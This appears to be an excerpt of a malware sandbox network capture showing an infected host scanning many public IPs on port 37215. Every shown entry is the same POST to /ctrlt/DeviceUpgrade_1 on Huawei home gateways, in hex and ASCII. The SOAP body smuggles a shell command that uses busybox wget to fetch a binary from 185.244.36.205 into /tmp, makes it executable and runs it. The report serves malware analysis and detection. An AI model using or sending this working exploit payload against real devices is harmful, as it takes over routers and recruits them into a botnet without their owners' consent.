                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2256192.168.2.155465694.157.58.2537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.465106010 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2257192.168.2.154544694.168.90.5237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.465167046 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2258192.168.2.153879431.110.25.24937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.465312004 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2259192.168.2.1544206156.93.61.7837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.465348005 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2260192.168.2.1553490222.6.55.12537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.465364933 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2261192.168.2.1543758102.95.189.7637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.465399027 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2262192.168.2.1552284122.143.255.16437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.465401888 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2263192.168.2.1551342200.246.0.22137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.465401888 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2264192.168.2.1557616190.41.196.24737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.465419054 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2265192.168.2.1545922190.235.200.15337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.465435028 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
